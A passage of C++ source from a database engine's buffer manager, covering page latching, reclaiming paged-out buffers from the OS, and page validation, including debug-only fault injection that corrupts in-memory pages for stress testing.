// Note that if we are replaying the initial required range of the DB, we take the flush state from the
// page as is and set it on the flush map, prior to any further validation around dbtime consistency, which
// is performed by the log-redo code afterwards. This means that if the dbtime consistency check fails (for
// example, with DbTimeTooOld), it's possible that this "bad" flush state could even get persisted to the
// flush map. This is acceptable because the redo failure prevents the required range from moving past this
// point, which means if we restart, we'll try and fix up the flush state again, and fail with db-time
// verification, and so on. In case the page gets patched in response to the error, the flush state is going
// to be set to 'unknown', which will then work out well once we restart post-patching.
if ( pbf->err == errBFIPageNotVerified )
{
if ( ( err >= JET_errSuccess ) &&
( fReplayingRequiredRange || ( pfmp->PFlushMap()->PgftGetPgnoFlushType( pgno ) == CPAGE::pgftUnknown ) ) )
{
pfmp->PFlushMap()->SetPgnoFlushType( pgno, cpage.Pgft(), cpage.Dbtime() );
}
else if ( ( err == JET_errPageNotInitialized ) && fReplayingRequiredRange )
{
pfmp->PFlushMap()->SetPgnoFlushType( pgno, CPAGE::pgftUnknown );
}
}
cpage.UnloadPage();
return err;
}
LOCAL BOOL FBFIBufferIsZeroed( const PBF pbf )
{
return FUtilZeroed( (BYTE*)pbf->pv, CbBFIBufferSize( pbf ) );
}
// this tells us if the pbf specified is the true buffer for the ifmp:pgno.
bool FBFICurrentPage(
__in const PBF pbf,
__in const IFMP ifmp,
__in const PGNO pgno
)
{
// Must own at least one kind (s, x, or w) of latch to ask this question
Assert( pbf->sxwl.FOwner() );
// This is the definition of current ifmp:pgno ...
return ( pbf->ifmp == ifmp &&
pbf->pgno == pgno &&
pbf->fCurrentVersion );
}
bool FBFIUpdatablePage( __in const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
if ( wrnBFPageFlushPending == pbf->err )
{
return fFalse;
}
return fTrue;
}
#ifdef DEBUG
// validates we own the latch type
BOOL FBFIOwnsLatchType( const PBF pbf, const BFLatchType bfltHave )
{
switch( bfltHave )
{
case bfltShared:
return pbf->sxwl.FOwnSharedLatch();
case bfltExclusive:
return pbf->sxwl.FOwnExclusiveLatch();
case bfltWrite:
return pbf->sxwl.FOwnWriteLatch();
default:
return false;
}
}
#endif
// Given a current latch type we have, releases latch ...
void BFIReleaseSXWL( __inout PBF const pbf, const BFLatchType bfltHave )
{
Assert( FBFIOwnsLatchType( pbf, bfltHave ) ); // redundant
switch( bfltHave )
{
case bfltShared:
Assert( pbf->sxwl.FOwnSharedLatch() );
pbf->sxwl.ReleaseSharedLatch();
break;
case bfltExclusive:
Assert( pbf->sxwl.FOwnExclusiveLatch() );
pbf->sxwl.ReleaseExclusiveLatch();
break;
case bfltWrite:
Assert( pbf->sxwl.FOwnWriteLatch() );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// we disabled this code late in E12/Vista due to concerns about correctness, but
// leaving here to leave the code a high fidelity as possible.
Expected( pbf->bfls != bflsHashed );
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
size_t iProc;
for ( iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
pbf->sxwl.ReleaseWriteLatch();
break;
default:
Assert( fFalse );
break;
}
}
// For now ...
#ifdef DEBUG
#define EXTRA_LATCHLESS_IO_CHECKS 1
#endif
// Fault in in ViewCache mode, where errors may be returned
ERR ErrBFIFaultInBufferIO( __inout BF * const pbf )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
TRY
{
const size_t cbChunk = min( (size_t)CbBFIPageSize( pbf ), OSMemoryPageCommitGranularity() );
for ( size_t ib = 0; ib < (size_t)CbBFIPageSize( pbf ); ib += cbChunk )
{
AtomicExchangeAdd( &((LONG*)((BYTE*)pbf->pv + ib))[0], 0 );
}
}
EXCEPT( efaExecuteHandler )
{
err = ErrERRCheck( JET_errDiskIO );
}
if ( err < JET_errSuccess )
{
// indicate a hard I/O error
//
OSUHAEmitFailureTag( PinstFromIfmp( pbf->ifmp ), HaDbFailureTagIoHard, L"9bb34106-505c-49b7-a67e-9aedb60756ca" );
}
return err;
}
#ifdef DEBUG
// Corrupts a random piece of data on the page such that ErrCheckPage() will fail.
BOOL FBFICorruptedNodeSizes( const BF * const pbf )
{
CPAGE cpageToCorrupt;
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
cpageToCorrupt.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// Note: This is a one way trip to he11.
(void)FNegTestSet( fCorruptingPageLogically );
if ( FNDCorruptRandomNodeElement( &cpageToCorrupt ) )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "FaultInjection: injecting corrupted OS MM page on ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
return fTrue;
}
return fFalse;
}
#endif // DEBUG
// Attempt to fault in (hard and/or soft) the page data.
void BFIFaultInBuffer( __inout void * pv, __in LONG cb )
{
Assert( 0 != cb );
Assert( !BoolParam( JET_paramEnableViewCache ) );
// force the buffer into our working set by touching its pages.
const size_t cbChunk = min( (size_t)cb, OSMemoryPageCommitGranularity() );
size_t ib;
for ( ib = 0; ib < (size_t)cb; ib += cbChunk )
{
(void)AtomicExchangeAdd( &((LONG*)((BYTE*)pv + ib))[0], 0 );
}
}
// Attempt to fault in (hard and/or soft) the page data.
void BFIFaultInBuffer( const PBF pbf )
{
#ifdef EXTRA_LATCHLESS_IO_CHECKS
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIUpdatablePage( pbf ) );
#else
Assert( pbf->sxwl.FOwner() );
#endif
// This looks protected from the normal ErrBFILatchPage() path where right after we
// evaluate if we were trimmed (leading to here in non-view cache mode), we then evaluate
// paging in for ViewCache mode. Which is good, because otherwise I'd argue bailing out
// right here is incorrect behavior. We would want to page in, though in exception
// handler for in-page errors to catch disk IO errors. But just in case, we'll bail here
// as it has no exception handler.
Assert( !FBFICacheViewCacheDerefIo( pbf ) );
if ( FBFICacheViewCacheDerefIo( pbf ) )
{
// In enable view cache mode we avoid these faults ...
return;
}
// force the buffer into our working set by touching its pages.
BFIFaultInBuffer( pbf->pv, CbBFIBufferSize( pbf ) );
}
// Returns if the buffer was empty, or partially empty (from an OS MM page perspective).
bool FBFIHasEmptyOSPages( const PBF pbf, LONG * pcmmpgReclaimed )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIUpdatablePage( pbf ) );
bool fHasEmptyOSPages = fFalse;
// we look at the start/end of each page. if any page is seen with zero
// data then we will try looking for any non-zero data on the whole page,
// then we will presume that we could not reclaim that page and that the
// buffer may now contain invalid page data
const size_t cbChunk = min( (size_t)CbBFIBufferSize( pbf ), OSMemoryPageCommitGranularity() );
size_t ib;
for ( ib = 0; ib < (size_t)CbBFIBufferSize( pbf ); ib += cbChunk )
{
if ( 0 == ((LONG*)((BYTE*)pbf->pv + ib))[0] &&
0 == ((LONG*)((BYTE*)pbf->pv + ib + cbChunk))[-1] &&
// if we think that we failed to reclaim the data for this buffer
// then we will checksum each VM page of the buffer looking
// for even a single set bit. if the checksum indicates that
// the page is all zeroes then we will presume (now with good
// certainty) that we lost the data in this buffer
FUtilZeroed( (BYTE*)pbf->pv + ib, cbChunk ) )
{
fHasEmptyOSPages = fTrue;
}
else
{
if ( pcmmpgReclaimed )
{
AtomicIncrement( pcmmpgReclaimed );
}
}
}
return fHasEmptyOSPages;
}
// This performs a (potentially destructive) OS soft fault. Unfortunately on failure it zilches
// out some of the buffer, so it is a destructive method. We return true if we managed to soft
// fault the page in without corruption / destruction. On failure the client should assume that
// the page is trashed and will need to be re-read.
bool FBFIDestructiveSoftFaultPage( PBF pbf, __in const BOOL fNewPage )
{
Assert( pbf->sxwl.FOwnWriteLatch() ); // must have right to write page
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) ); // No point is doing a page in of anything but current, policy, not req
Assert( FBFIUpdatablePage( pbf ) ); // otherwise buffer is undergoing write IO / flush
Assert( (DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() ); // otherwise we could zero out the 2nd BF page on this OS page
// note: if we evicted the BF when we free'd a page at a higher logical level then
// we wouldn't need the || fNewPage here, because the fNewPage case would be clean.
// but since we don't we can get a free'd page that is being reused as a new page as
// an already dirty page in the cache.
Assert( pbf->bfdf < bfdfDirty || fNewPage ); // otherwise we'd lose dirty / un-flushed data
Assert( !BoolParam( JET_paramEnableViewCache ) );
// This is the little bit of OS MM magic that allows us to trick the OS into giving us soft
// faults, without giving us hard faults (instead gives us zero'd out page, thus the
// destructive part).
// if we are going to try for a reclaim then reset the page
// before we touch it to avoid causing a hard page fault if
// the page data has been evicted by the OS
OSMemoryPageReset( pbf->pv, CbBFIBufferSize( pbf ) );
// Next try to soft fault in the pages of the buffer, note since we reset the page if we
// can't soft fault in the OS MM will give us a page of zeros.
BFIFaultInBuffer( pbf );
// if we are trying to reclaim the page then we will look at
// the start/end of each page. if any page is seen with zero
// data then we will presume that we could not reclaim that
// page and that the buffer may now contain invalid page data
// Determine if the page has been trashed because the OS memory manager gave us back a page
// that is all zeros.
const BOOL fLosePageToOsPageFile = ( !FNegTest( fStrictIoPerfTesting ) && ErrFaultInjection( 17396 ) < JET_errSuccess );
if ( fLosePageToOsPageFile )
{
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpageRuined; // NOTE: MUST be careful what in the page image you use here ...
// Even though we're before our fault injecting zeroing, the page may already be dead b/c
// the OS did lose the page already (and so fault injection is superfluous). BUT the most
// likely case is the page is not ruined yet, and for debugging we'd want the DBTIME, so
// add it to trace event for diagnostics.
cpageRuined.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
const DBTIME dbtimeBeforePageOut = FBFIDatabasePage( pbf ) ? cpageRuined.Dbtime() : 0x4242000000004242 /* 0n4774378554966164034 */;
OSTrace( JET_tracetagBufferManager, OSFormat( "FaultInjection: injecting failed OS MM reclaim on ifmp:pgno %d:%d @ %I64d (0x%I64x)", (ULONG)pbf->ifmp, pbf->pgno, dbtimeBeforePageOut, dbtimeBeforePageOut ) );
Assert( (ULONG)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() ); // otherwise we're endangering other unlatched BFs
const size_t cbChunk = OSMemoryPageCommitGranularity();
const size_t cMaxChunk = (size_t)CbBFIBufferSize( pbf ) / cbChunk;
const size_t iZeroedChunk = rand() % cMaxChunk;
const BYTE * pb = (BYTE*)pbf->pv + ( iZeroedChunk * cbChunk );
memset( (void*)pb, 0, cbChunk ); // probably do not need to do this, but good to be complete in case it causes corruption
}
BOOL fPageTrashed = FBFIHasEmptyOSPages( pbf, (LONG*)&g_cpgReclaim );
Assert( !fLosePageToOsPageFile || fPageTrashed );
// a non-trashed DB page, with a BF that isn't in error state, should have a valid page
if ( FBFIDatabasePage( pbf ) && !fPageTrashed && pbf->err >= JET_errSuccess )
{
// we should have a valid page, but double check w/ Page Manager
CPAGE cpageCheck;
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
cpageCheck.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
if ( cpageCheck.FPageIsInitialized() )
{
// fault inject ... note this isn't a real usage case, this is presumming a bug
// has caused corruption of our memory at this point.
OnDebug( const BOOL fCorruptOnPageIn = ( ErrFaultInjection( 36380 ) < JET_errSuccess ) &&
FBFICorruptedNodeSizes( pbf ) );
#ifdef DEBUG
if ( fCorruptOnPageIn )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "FaultInjection: injecting corruption on OS MM reclaim on ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
}
#endif
// validate the page with the Page Manager
const ERR errCheckPage = cpageCheck.ErrCheckPage( CPRINTFDBGOUT::PcprintfInstance(),
OnDebugOrRetail( ( fCorruptOnPageIn ? CPAGE::OnErrorReturnError : CPAGE::OnErrorFireWall ), CPAGE::OnErrorFireWall ),
CPAGE::CheckLineBoundedByTag );
Assert( errCheckPage == JET_errSuccess || fCorruptOnPageIn ); // OnErrorEnforce should prevent this.
// This is technically DEBUG only code b/c we Enforce above for now b/c we need to know if
// this is really happening on page back in ... I'm only doing this b/c it allows me to
// trash a page, and survive and let the stress / test run continue.
fPageTrashed = ( errCheckPage != JET_errSuccess );
AssertSz( errCheckPage == JET_errSuccess || fCorruptOnPageIn, "We hit a corruption on a page in event." );
}
}
if ( fPageTrashed )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "BF failed reclaim (OS soft fault), note page partially zero'd ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentReclaimedFailed ) );
}
else
{
OSTrace( JET_tracetagBufferManager, OSFormat( "BF succeeded reclaim (OS soft fault) from the OS ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentReclaimedSuccess ) );
}
return !fPageTrashed;
}
//
// Page Reclaimation logic (do not confuse this with claymation, they are unrelated)
//
//
// There are 3 true mechanisms through which a page reclaimation could happen:
//
// 1. OS Soft Fault - The best option because no disk access required.
// 2. DB Sync Read - The 2nd best option because DB volume may have more IO capacity, and
// further we read in true page size IO, wherease page faults are usually
// less.
// 3. OS Hard Fault - The 3rd best option because we fault in data from OS page file, possibly
// in more than one read IO.
//
// But the problem is we can't just ask for a OS soft fault, we have to use an OS MM trick to do
// an opportunistic soft fault, and this trick is unfortunately destructive to the buffer data on
// a failed soft fault.
//
// A second problem is we can't just ask for a OS hard fault either, we have to use a write
// memory operation (AtomicExchangeAdd( pv, 0 )), and with the extra latchless IO validation
// (page is protected to be RO) this will AV.
//
// So this leads us to 4 paths or options:
//
// A. Attempt Destructive Opportunistic Soft Fault (if we can destroy data)
// B. If page destroyed, Database Sync Read
// C. Fault In (could be Soft or Hard)
// D. Do nothing ... and let later buffer access demand (hard or soft) fault the data.
//
void BFIReclaimPageFromOS(
__inout PBF pbf,
__in const BFLatchType bfltHave,
__in const BOOL fNewPage,
__in const BOOL fWait,
__in const OSFILEQOS qos,
__in const CPageEvents cpe,
__in const TraceContext& tc
)
{
CSXWLatch::ERR errSXWL = CSXWLatch::ERR::errSuccess;
BFLatchType bfltAchieved = bfltHave;
Assert( !BoolParam( JET_paramEnableViewCache ) );
Assert( bfltHave == bfltShared || bfltHave == bfltExclusive || bfltHave == bfltWrite );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
// we will not try to do this if a buffer is smaller than a VM
// page or the page is dirty
// we used to try soft fault if we were dirty and it was a new
// page request ... but we can't do this. It is very complex
// reason why.
const BOOL fAttemptDestructiveSoftFault = ( !FNegTest( fStrictIoPerfTesting ) &&
(DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() &&
( pbf->bfdf < bfdfDirty ) );
//
// First we try to ratchet our latch type as high as possible to use the best reclaim mechanism we can support.
//
if ( fAttemptDestructiveSoftFault )
{
switch( bfltHave )
{
case bfltShared:
// HACK: we cannot wait for the write latch because there
// is code that acquires multiple share latches on the
// same thread. in that case, an attempt to resolve a
// page not resident condition on a subsequent share latch
// will cause a deadlock
errSXWL = pbf->sxwl.ErrTryUpgradeSharedLatchToWriteLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess || errSXWL == CSXWLatch::ERR::errLatchConflict );
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
bfltAchieved = bfltWrite;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// this code is ugly enough without supporting hashed latches
if ( pbf->bfls == bflsHashed )
{
pbf->sxwl.DowngradeWriteLatchToSharedLatch();
bfltAchieved = bfltShared;
}
#endif // MINIMAL_FUNCTIONALITY
}
break;
case bfltExclusive:
Assert( pbf->sxwl.FOwnExclusiveLatch() );
if ( fWait )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
errSXWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess ||
errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
if ( errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
bfltAchieved = bfltWrite;
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// this code is ugly enough without supporting hashed latches
if ( pbf->bfls == bflsHashed )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
bfltAchieved = bfltExclusive;
}
#endif // MINIMAL_FUNCTIONALITY
}
break;
case bfltWrite:
break; // do nothing
default:
AssertSz( fFalse, "Unknown latch type (%d), bad things will probably happen!", bfltHave );
}
}
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// Either we didn't try, or could not improve the latch type, either way maybe we can get
// get to the x-latch uncontended ... so we can try Option C (Method #1 or Method #3).
if ( bfltAchieved == bfltShared )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess || errSXWL == CSXWLatch::ERR::errLatchConflict );
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
bfltAchieved = bfltExclusive;
}
}
#endif
Assert( FBFIOwnsLatchType( pbf, bfltAchieved ) );
//
// Try to grab the right to make the page resident.
//
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsResident );
if ( bfrsResident == bfrsOld )
{
// Though this function is not called unless the page was known to be not resident, timing
// can let this change, so we were too slow, someone else got in and made this page resident.
goto HandleError;
}
//
// We need to validate that we can page this in / perform destructive soft faults.
//
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// if the page is undergoing a write in the extra
// check code, then the page has been protected to
// cause AVs if someone updates / references it.
// so we need the x-latch + to verify the BF is not
// undergoing write IO
if ( bfltAchieved >= bfltExclusive &&
#else
if ( bfltAchieved == bfltWrite &&
#endif
!FBFIUpdatablePage( pbf ) )
{
// If we have the write latch, then we will be trying a destructive soft fault, and so
// we must make sure the page is not updatable.
goto HandleError;
}
//
// Alright, finally try to reclaim the page through one of the options mentioned above.
//
if ( fAttemptDestructiveSoftFault && bfltAchieved == bfltWrite )
{
//
// Attempt Option A / Method #1, OS Soft Fault
//
if ( !FBFIDestructiveSoftFaultPage( pbf, fNewPage ) && !fNewPage )
{
// Whoopsie! We destroyed the data on some portion of the page ... cover our tracks
// by re-reading in the page from the database (Option B / Method #2).
//
// if we think that we failed to reclaim the data for this
// buffer and we need it (i.e. bflfNew was not specified)
// then we will checksum each VM page of the buffer looking
// for even a single set bit. if the checksum indicates that
// the page is all zeroes then we will presume (now with good
// certainty) that we lost the data in this buffer and we will
// go ahead and reread it from the database
if ( pbf->icbBuffer != pbf->icbPage )
{
// We are about to re-read the page, so we must expand the buffer back to
// full size
CallS( ErrBFISetBufferSize( pbf, (ICBPage)pbf->icbPage, fTrue ) );
}
TraceContextScope tcReclaimFromOS;
tcReclaimFromOS->iorReason.AddFlag( iorfReclaimPageFromOS );
BFISyncRead( pbf, qos, *tcReclaimFromOS );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentRedirectedToDatabase ) );
PERFOpt( cBFPagesRepeatedlyRead.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "Sync-read page=[0x%x:0x%x] (due to OS reclaim fail)", (ULONG)pbf->ifmp, pbf->pgno ) );
(void)ErrBFIValidatePage( pbf, bfltWrite, cpe, *tcReclaimFromOS );
// Note: Error is dealt with in ErrBFILatchPage()
Assert( !fNewPage );
goto HandleError; // skip page back-in validation below.
}
// else we successfully triggered an OS soft fault ... yeah, IO saved!!!
// (or it was a new page operation, so it doesn't matter)
if ( fNewPage )
{
Assert( bfltHave == bfltWrite );
if ( pbf->icbBuffer != pbf->icbPage )
{
// New pages should be full buffer size
CallS( ErrBFISetBufferSize( pbf, (ICBPage)pbf->icbPage, fTrue ) );
}
// We want to zilch out the header so that we can check that any new page has a
// DBTIME set before it goes to disk (i.e. is w-unlatched).
memset( pbf->pv, 0, sizeof(CPAGE::PGHDR2) );
}
}
else
#ifdef EXTRA_LATCHLESS_IO_CHECKS
if ( bfltAchieved >= bfltExclusive )
#endif
{
//
// Option C / Method #1 or #3 - Explicit Fault In (soft or hard)
//
const HRT hrtFaultStart = HrtHRTCount(); // its a _fault_ start, not a false start ... bah, you'll laugh later
BFIFaultInBuffer( pbf );
const HRT dhrtFault = HrtHRTCount() - hrtFaultStart;
const QWORD cusecFaultTime = CusecHRTFromDhrt( dhrtFault );
Assert( ( ( 1000 * dhrtFault ) / HrtHRTFreq() ) < (HRT)lMax ); // certainly in our test pass, inconceivable!
if ( cusecFaultTime > 100 )
{
// we exclude cusecFaultTime < 100 us because it was probably a soft fault (or maybe SSD?) ...
PERFOpt( AtomicAdd( (QWORD*)&g_cusecNonResidentFaultedInLatencyTotal, cusecFaultTime ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentReclaimedHardSuccess ) );
BFITrackCacheMissLatency( pbf, hrtFaultStart, bftcmrReasonPagingFaultOs, qos, tc, JET_errSuccess );
}
OSTrace( JET_tracetagBufferManager, OSFormat( "BF forced fault (soft or hard fault) from the OS ifmp:pgno %d:%d in %I64d ms", (ULONG)pbf->ifmp, pbf->pgno, cusecFaultTime / 1000 ) );
}
if ( bfltAchieved >= bfltExclusive && FBFIDatabasePage( pbf ) && pbf->err >= JET_errSuccess && !fNewPage )
{
// we should have a valid page, but double check w/ Page Manager
CPAGE cpageCheck;
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
cpageCheck.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// interesting case from recovery::redo where we latch an empty page without the
if ( cpageCheck.FPageIsInitialized() )
{
#ifdef DEBUG
if ( ErrFaultInjection( 52764 ) < JET_errSuccess )
{
(void)FBFICorruptedNodeSizes( pbf );
}
#endif
(void)cpageCheck.ErrCheckPage( CPRINTFDBGOUT::PcprintfInstance(),
CPAGE::OnErrorFireWall,
CPAGE::CheckLineBoundedByTag );
// void b/c we shouldn't return from the above call on failure.
}
}
HandleError:
// if we upgraded to a write latch to try and reclaim then go
// back down to the proper latch level
Assert( bfltHave <= bfltAchieved );
switch( bfltAchieved )
{
case bfltWrite:
if ( bfltHave == bfltShared )
{
pbf->sxwl.DowngradeWriteLatchToSharedLatch();
}
else if ( bfltHave == bfltExclusive )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
else
{
Assert( bfltAchieved == bfltHave );
}
break;
case bfltExclusive:
if ( bfltHave == bfltShared )
{
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
}
else
{
Assert( bfltAchieved == bfltHave );
}
break;
default:
Assert( bfltAchieved == bfltHave );
}
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
}
// Given a bflf, determine which events should be logged by the CPAGE validation code
CPageEvents CpeBFICPageEventsFromBflf( const BFLatchFlags bflf )
{
INT flags;
if ( bflf & bflfNoEventLogging )
{
flags = CPageValidationLogEvent::LOG_NONE;
}
else
{
flags = CPageValidationLogEvent::LOG_ALL;
if ( bflf & bflfUninitPageOk )
{
flags = flags & ~CPageValidationLogEvent::LOG_UNINIT_PAGE;
}
if ( bflf & bflfExtensiveChecks )
{
flags = flags | CPageValidationLogEvent::LOG_EXTENSIVE_CHECKS;
}
}
return flags;
}
NOINLINE void BFIAsyncReadWait( __in PBF pbf, __in const BFLatchType bfltWaiting, const BFPriority bfpri, const TraceContext& tc )
{
// No Assert( pbf->sxwl.FWaitingForExclusive ); type member that I know of.
PERFOpt( cBFPrereadStall.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
HRT hrtStart = HrtHRTCount();
switch( bfltWaiting )
{
case bfltShared:
pbf->sxwl.WaitForSharedLatch();
break;
case bfltExclusive:
pbf->sxwl.WaitForExclusiveLatch();
break;
default:
AssertSz( fFalse, "Waiting for unexpected latchtype in BFIAsyncReadWait!" );
}
TraceContextScope tcAsyncReadWait( iorpBFLatch );
// Only valid in non-ViewCache mode ... in ViewCache mode the regular ErrIORead() call merely
// accomplishes mapping the page, and actual IO will be (and latency accumulated) at ErrMMIORead()
// right before BF Validates / checksums the page.
if ( !FBFICacheViewCacheDerefIo( pbf ) )
{
BFITrackCacheMissLatency( pbf,
hrtStart,
bftcmrReasonPrereadTooSlow,
QosBFUserAndIoPri( bfpri ),
*tcAsyncReadWait,
pbf->err == errBFIPageNotVerified ? JET_errSuccess : pbf->err );
}
Assert( FBFIOwnsLatchType( pbf, bfltWaiting ) );
}
C_ASSERT( bfltShared == CSXWLatch::iSharedGroup );
C_ASSERT( bfltExclusive == CSXWLatch::iExclusiveGroup );
C_ASSERT( bfltWrite == CSXWLatch::iWriteGroup );
const BFLatchFlags bflfDefaultValue = bflfDefault;
void BFIInitialize( __in PBF pbf, const TraceContext& tc )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
const IFMP ifmp = pbf->ifmp;
AssertRTL( pbf->err > -65536 && pbf->err < 65536 );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( ifmp ), pbf->tce ) );
}
// move the BF to the appropriate table class
PERFOpt( cBFCache.Dec( PinstFromIfmp( ifmp ), pbf->tce, ifmp ) );
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), (TCE) tc.nParentObjectClass, ifmp ) );
pbf->tce = (TCE) tc.nParentObjectClass;
// clear the error state of this BF
pbf->err = JET_errSuccess;
// if the page was previously abandoned, as a new page, it is no longer such ...
pbf->fAbandoned = fFalse;
// UNDONE: SOMEONE says that we should always reset the entire page here _if_ the page is clean.
// If the page is dirty we can't reset anything because the page might be versioned by BFWriteLatch,
// in which case we end up writing a zeroed-out page to disk, which breaks recovery.
if ( pbf->icbBuffer != pbf->icbPage &&
pbf->bfdf == bfdfClean )
{
// move the buffer to be an appropriate size for a new page
CallS( ErrBFISetBufferSize( pbf, (ICBPage)pbf->icbPage, fTrue ) );
}
}
ERR ErrBFILatchPage( _Out_ BFLatch* const pbfl,
const IFMP ifmp,
const PGNO pgno,
const BFLatchFlags bflf,
const BFLatchType bfltReq,
const BFPriority bfpri,
const TraceContext& tc,
_Out_ BOOL* const pfCachedNewPage )
{
ERR err = JET_errSuccess;
BFLatchFlags bflfT = bflf;
BFLatchType bfltHave = bfltNone;
BOOL fCacheMiss = fFalse;
IFMPPGNO ifmppgno = IFMPPGNO( ifmp, pgno );
ULONG cRelatches = 0;
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
CSXWLatch::ERR errSXWL = CSXWLatch::ERR::errSuccess;
Enforce( pgno != pgnoNull );
Assert( bfltReq != bfltNone );
if ( !FParentObjectClassSet( tc.nParentObjectClass ) )
{
FireWall( "TcLatchObjectClassNotSet" );
}
if ( !FEngineObjidSet( tc.dwEngineObjid ) )
{
FireWall( "TcLatchEngineObjidNotSet" );
}
const CPageEvents cpe = CpeBFICPageEventsFromBflf( bflf );
#ifdef DEBUG
const ULONG cRelatchesLimit = 11;
// a bit heavy on stack (264 bytes on 64-bit), just crossing my fingers ...
struct _BFIRelatchTrackingInfo {
TICK tickStart;
TICK tickHashLock;
TICK tickLatch;
ULONG ulLineContinue;
PBF pbf;
} relatchinfo [cRelatchesLimit];
#endif
// Anything larger than 0x7FFFFFFF will be rejected by the flushmap with
// invalid parameter (and asserted on as we've got good defensive code ;).
Expected( pgno <= pgnoSysMax );
// This is double checking / catching if DbScan scans off the EOF of the
// database file (to avoid DbScan running forever - as was the case under
// paramEnableViewCache in Win8.1 and prior). This _can_ theoretically
// fire, if someone sets a larger than 1 GB extension size, because PgnoLast()
// doesn't account for the async pre-extend, which DbScan does check / read.
Expected( ( pgno < g_rgfmp[ifmp].PgnoLast() + 262144 ) /* 1 GB in 4 KB pages */ || ( bflfT & bflfLatchAbandoned ) );
// This assert is important (probably for a few reasons actually, but as of
// the introduction of HyperCache / page dehydration) also because we sort
// of stealth rehydrate the clean pages without fixing up the DB header...
// this is because the full rehydrate does page validation, but if we're
// repurposing an existing buffer as a new page, we can't really expect it
// will pass new page validation before cpage::PreInitializeNewPage_() gets to
// the buffer.
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) || ( bfltReq == bfltWrite ) );
// try forever until we read latch the page or fail with an error
forever
{
Assert( bfltHave == bfltNone );
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fFalse;
}
Assert( cRelatches < cRelatchesLimit );
Assert( cRelatches == 0 || relatchinfo[cRelatches-1].ulLineContinue ); // continue didn't update line?
OnDebug( memset( &(relatchinfo[cRelatches]), 0, sizeof(relatchinfo[cRelatches]) ) );
OnDebug( relatchinfo[cRelatches].tickStart = TickOSTimeCurrent() );
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( ifmppgno, &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
OnDebug( relatchinfo[cRelatches].tickHashLock = TickOSTimeCurrent() );
OnDebug( relatchinfo[cRelatches].pbf = pgnopbf.pbf );
